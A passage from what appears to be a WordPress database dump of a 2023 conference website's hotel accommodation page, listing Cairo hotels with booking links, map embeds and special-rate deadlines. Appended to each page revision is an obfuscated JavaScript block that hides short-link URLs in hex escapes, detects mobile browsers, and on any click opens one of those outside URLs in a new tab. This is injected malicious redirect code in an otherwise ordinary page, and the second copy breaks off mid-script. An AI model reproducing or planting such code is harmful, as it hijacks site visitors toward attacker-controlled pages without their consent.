allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_photos_carousel image_border_radius=\"0px\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 18:54:07','2023-06-25 18:54:07','',2685,'https://gsw2023.com/?p=4835',0,'revision','',0),
(4836,4,'2023-06-25 18:55:23','2023-06-25 18:55:23','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_photos_carousel post_type=\"posts\" order=\"asc\" orderby=\"title\" image_border_radius=\"0px\" project_icon_color=\"#ffffff\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" posts=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 